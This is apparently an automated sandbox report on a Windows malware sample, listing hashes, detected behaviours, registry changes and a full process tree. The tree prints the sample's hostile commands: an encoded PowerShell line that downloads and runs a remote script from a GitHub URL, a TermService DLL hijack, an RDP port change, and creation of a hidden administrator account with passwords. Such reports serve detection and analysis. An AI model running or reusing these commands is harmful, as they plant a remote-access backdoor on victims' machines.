Analysis
-
Max time kernel: 50s
Max time network: 118s
Platform: windows10_x64
Resource: win10v20201028
Submitted: 09-11-2020 21:35

Static task: static1
Behavioral task: behavioral1
  Sample: eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe
  Resource: win7v20201028
Behavioral task: behavioral2
  Sample: eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe
  Resource: win10v20201028

General
-
Target: eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe
Size: 3.5MB
MD5: 551466c49c45b71ee7b4d5a4fc0a800e
SHA1: be312273c1db869c5f23cc9ba24b31b66824a809
SHA256: eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2
SHA512: 1f4de516895870a74444b560df538259137900d73b78970926d7bebd0e759976630273e21c8cd6921aec85d614d6d305071cccf5c217762665e5e91d24694e4a
Malware Config
-
Extracted URL: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges (1 TTP)
Uses net.exe to modify the user's privileges.
-
Blacklisted process makes network request (9 IoCs)
Processes:
  flow 16: pid 2544 powershell.exe
  flow 18: pid 2544 powershell.exe
  flow 19: pid 2544 powershell.exe
  flow 20: pid 2544 powershell.exe
  flow 22: pid 2544 powershell.exe
  flow 24: pid 2544 powershell.exe
  flow 26: pid 2544 powershell.exe
  flow 28: pid 2544 powershell.exe
  flow 30: pid 2544 powershell.exe
-
Modifies RDP port number used by Windows (1 TTP)
-
Sets DLL path for service in the registry (2 TTPs)
-
Resource / YARA rule:
  \Windows\Branding\mediasrv.png: upx
  \Windows\Branding\mediasvc.png: upx
-
Deletes itself (1 IoC)
Processes:
  pid 940 powershell.exe
-
Loads dropped DLL (2 IoCs)
Processes:
  pid 1312
  pid 1312
-
Modifies service (2 TTPs, 2 IoCs)
Processes:
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters (reg.exe)
  Set value (str): \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" (reg.exe)
-
Drops file in Program Files directory (4 IoCs)
Processes:
  File opened for modification: C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI (powershell.exe)
  File opened for modification: C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT (powershell.exe)
  File opened for modification: C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI (powershell.exe)
  File opened for modification: C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT (powershell.exe)
-
Drops file in Windows directory (19 IoCs)
Processes:
  File opened for modification: C:\Windows\branding\Basebrd (powershell.exe)
  File opened for modification: C:\Windows\branding\mediasvc.png (powershell.exe)
  File opened for modification: C:\Windows\branding\wupsvc.jpg (powershell.exe)
  File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIEC8A.tmp (powershell.exe)
  File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIEC9B.tmp (powershell.exe)
  File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat (powershell.exe)
  File opened for modification: C:\Windows\branding\ShellBrd (powershell.exe)
  File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_1zz0yctp.w4n.ps1 (powershell.exe)
  File created: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP (powershell.exe)
  File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIEC4A.tmp (powershell.exe)
  File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
  File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (powershell.exe)
  File created: C:\Windows\branding\mediasrv.png (powershell.exe)
  File created: C:\Windows\branding\mediasvc.png (powershell.exe)
  File created: C:\Windows\branding\wupsvc.jpg (powershell.exe)
  File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_5lv1s5pl.pte.psm1 (powershell.exe)
  File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIEC7A.tmp (powershell.exe)
  File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIECCB.tmp (powershell.exe)
  File opened for modification: C:\Windows\branding\mediasrv.png (powershell.exe)
-
Modifies data under HKEY_USERS (217 IoCs)
Processes:
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0 (powershell.exe)
  Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ (powershell.exe)
  Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016" (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs (powershell.exe)
  Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs (powershell.exe)
  Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" (powershell.exe)
  Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" (powershell.exe)
  Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" (powershell.exe)
  Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (powershell.exe)
  Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ (powershell.exe)
  Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" (powershell.exe)
  Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates (powershell.exe)
  Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" (powershell.exe)
  Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1" (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs (powershell.exe)
  Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs (powershell.exe)
  Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" (powershell.exe)
  Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" (powershell.exe)
  Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges (powershell.exe)
  Set value (data): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = de4ef1e88fadd601 (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust (powershell.exe)
  Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33" (powershell.exe)
  Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map (powershell.exe)
  Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" (powershell.exe)
  Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" (powershell.exe)
  Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" (powershell.exe)
  Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219" (powershell.exe)
  Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (WMIC.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains (powershell.exe)
  Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" (powershell.exe)
  Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." (powershell.exe)
  Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" (powershell.exe)
  Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" (powershell.exe)
  Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs (powershell.exe)
  Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3" (powershell.exe)
  Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3" (powershell.exe)
  Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3" (powershell.exe)
  Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" (powershell.exe)
  Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing (powershell.exe)
  Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" (powershell.exe)
  Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates (powershell.exe)
  Set value (data): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones (powershell.exe)
  Set value (int): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33" (powershell.exe)
  Set value (str): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" (powershell.exe)
-
Modifies registry key (1 TTP, 1 IoC)
-
Runs net.exe
-
Script User-Agent (2 IoCs)
Uses user-agent string associated with script host/environment.
Processes:
  flow 18: HTTP User-Agent header: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  flow 20: HTTP User-Agent header: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
-
Suspicious behavior: EnumeratesProcesses (9 IoCs)
Processes:
  pid 940 powershell.exe (recorded 6 times)
  pid 2544 powershell.exe (recorded 3 times)
-
Suspicious behavior: LoadsDriver (2 IoCs)
Processes:
  pid 616
  pid 616
-
Suspicious use of AdjustPrivilegeToken (77 IoCs)
Processes: powershell.exe (pid 940)
  Token: SeDebugPrivilege
  Token sequence, recorded three times in this order: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
-
Suspicious use of WriteProcessMemory (72 IoCs)
Processes (source pid / process -> target pid / process; each event recorded twice):
  1028 eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe -> 940 powershell.exe (x2)
  940 powershell.exe -> 3656 csc.exe (x2)
  3656 csc.exe -> 2224 cvtres.exe (x2)
  940 powershell.exe -> 2556 reg.exe (x2)
  940 powershell.exe -> 184 reg.exe (x2)
  940 powershell.exe -> 208 reg.exe (x2)
  940 powershell.exe -> 428 net.exe (x2)
  428 net.exe -> 2524 net1.exe (x2)
  940 powershell.exe -> 2064 cmd.exe (x2)
  2064 cmd.exe -> 3300 cmd.exe (x2)
  3300 cmd.exe -> 2380 net.exe (x2)
  2380 net.exe -> 4020 net1.exe (x2)
  940 powershell.exe -> 3976 cmd.exe (x2)
  3976 cmd.exe -> 3176 cmd.exe (x2)
  3176 cmd.exe -> 3156 net.exe (x2)
  3156 net.exe -> 2360 net1.exe (x2)
  2544 cmd.exe -> 2180 net.exe (x2)
  2180 net.exe -> 3904 net1.exe (x2)
  3980 cmd.exe -> 3424 net.exe (x2)
  3424 net.exe -> 200 net1.exe (x2)
  2600 cmd.exe -> 2524 net.exe (x2)
  2524 net.exe -> 2460 net1.exe (x2)
  3964 cmd.exe -> 2420 net.exe (x2)
  2420 net.exe -> 752 net1.exe (x2)
  2508 cmd.exe -> 3084 net.exe (x2)
  3084 net.exe -> 2544 net1.exe (x2)
  3956 cmd.exe -> 2856 net.exe (x2)
  2856 net.exe -> 3980 net1.exe (x2)
  3996 cmd.exe -> 3588 WMIC.exe (x2)
  2960 cmd.exe -> 2380 WMIC.exe (x2)
  1580 cmd.exe -> 3988 cmd.exe (x2)
  3988 cmd.exe -> 2544 powershell.exe (x2)
Processes
-
[1] C:\Users\Admin\AppData\Local\Temp\eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe"
    - Suspicious use of WriteProcessMemory
  [2] \??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: -ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
      - Deletes itself
      - Drops file in Windows directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xmkjgs20\xmkjgs20.cmdline"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8022.tmp" "c:\Users\Admin\AppData\Local\Temp\xmkjgs20\CSC3C8662C2998F402F926B99A1C49107C.TMP"
    [3] C:\Windows\system32\reg.exe
        cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    [3] C:\Windows\system32\reg.exe
        cmdline: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
        - Modifies service
        - Modifies registry key
    [3] C:\Windows\system32\reg.exe
        cmdline: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    [3] C:\Windows\system32\net.exe
        cmdline: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\net1.exe
          cmdline: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    [3] C:\Windows\system32\cmd.exe
        cmdline: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmdline: cmd /c net start rdpdr
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\net.exe
            cmdline: net start rdpdr
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\system32\net1.exe
              cmdline: C:\Windows\system32\net1 start rdpdr
    [3] C:\Windows\system32\cmd.exe
        cmdline: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmdline: cmd /c net start TermService
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\net.exe
            cmdline: net start TermService
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\system32\net1.exe
              cmdline: C:\Windows\system32\net1 start TermService
    [3] C:\Windows\system32\cmd.exe
        cmdline: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    [3] C:\Windows\system32\cmd.exe
        cmdline: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe user wgautilacc Ghar4f5 /del
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe user wgautilacc Ghar4f5 /del
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe user wgautilacc xvYay6Ls /add
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe user wgautilacc xvYay6Ls /add
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 user wgautilacc xvYay6Ls /add
[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe LOCALGROUP "Administrators" wgautilacc /ADD
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe user wgautilacc xvYay6Ls
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe user wgautilacc xvYay6Ls
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 user wgautilacc xvYay6Ls
[1] C:\Windows\System32\cmd.exe
    cmdline: cmd.exe /C wmic path win32_VideoController get name
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\Wbem\WMIC.exe
      cmdline: wmic path win32_VideoController get name
      - Modifies data under HKEY_USERS
[1] C:\Windows\System32\cmd.exe
    cmdline: cmd.exe /C wmic CPU get NAME
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\Wbem\WMIC.exe
      cmdline: wmic CPU get NAME
[1] C:\Windows\System32\cmd.exe
    cmdline: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\cmd.exe
      cmdline: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
        - Blacklisted process makes network request
        - Drops file in Program Files directory
        - Drops file in Windows directory
        - Modifies data under HKEY_USERS
        - Suspicious behavior: EnumeratesProcesses
[1] C:\Windows\System32\cmd.exe
    cmdline: cmd.exe /C net user wgautilacc 1234
  [2] C:\Windows\system32\net.exe
      cmdline: net user wgautilacc 1234
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 user wgautilacc 1234
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES8022.tmp
  MD5: f1c19fdcd8e34091b934106f106183b1
  SHA1: db8f845fe8cce2845257263e8b7148e415b1f904
  SHA256: dbf6f142324e7dbeda2167e6ae05ea01e984b988e67a03f4d981861ca0cfd006
  SHA512: 4284b947d27b0fedb1029a977366febaf5776e3169d4929ef25584b1fc836402bb8f30ff2d37a3ee7839634a201faa38a36c9cd9bf1e7f053e0c6170015381b6
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1
  MD5: bcac3bbb18f093dbc8e5e76d2675695f
  SHA1: 96453f65b41e428937349e6f48fe67d6dfd6a580
  SHA256: b25768626991b9a33e3ada79e3beb92fa5d83e1b50f2820e6fa2d6cf4827b21a
  SHA512: 78c55502c7d0484b458fadb78bc075b8eda01b794e2037283df11dc58105bd632c0e747e92fd7aac7b79c5ac0ddce9bb2c6e7ce158c743c9f080a52eda0498ab
-
C:\Users\Admin\AppData\Local\Temp\get-points.zip
  MD5: 42c2a160d2d191e6ffcc1076b4734ee2
  SHA1: c8a71ddb77c6bad039fbb041bbf7ea2021ca9d49
  SHA256: 2b8aebe68161f07e7029bac05eeeb009455553731baf60b447d0d4aaa9fded99
  SHA512: 3b9de3ad6cbe4db3958564b4bd37a45e6aa3a62a4a6e6756d6e997a9cc9c2dca31053e9e0aa300c1660b72332eb1f677f6b65762825ac68a99a55d06043e0939
-
C:\Users\Admin\AppData\Local\Temp\xmkjgs20\xmkjgs20.dll
  MD5: 94e31e7357d6b8274ea78e8eb2265982
  SHA1: 24b8622e8502f3932dda8a0fe3425cca9608db31
  SHA256: a3790a9a02138e9575cf5092fe2d1f91c2ef194d8aa256627ad02e2fbeed0c7e
  SHA512: 99fccd8aead3b37d0a7328cffb1e654e8cf7d5cf8b144a39882848c6c84acfb5558937d3ebe15c5785fbde90121e839231f4182365b4836aba0080fa2638d4b7
-
\??\c:\Users\Admin\AppData\Local\Temp\xmkjgs20\CSC3C8662C2998F402F926B99A1C49107C.TMP
  MD5: ff15bea84c021981afbeaef3c8f191ca
  SHA1: cc351c79314b2f6e8fa6f18e2cc1c6b5eca991cf
  SHA256: 26035b74e539e4882d4ad60382794b546d801867425debc0a0848d497a3615ca
  SHA512: a50c71cf6e594826922a9025805d97d50f107f152f60c5b880a070498ca233e793d4e4b53c11daf289b2a555f23b5e24bb8a27228653f9ae46292a0ac5048927
-
\??\c:\Users\Admin\AppData\Local\Temp\xmkjgs20\xmkjgs20.0.cs
  MD5: 6f235215132cdebacd0f793fe970d0e3
  SHA1: 2841e44c387ed3b6f293611992f1508fe9b55b89
  SHA256: ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
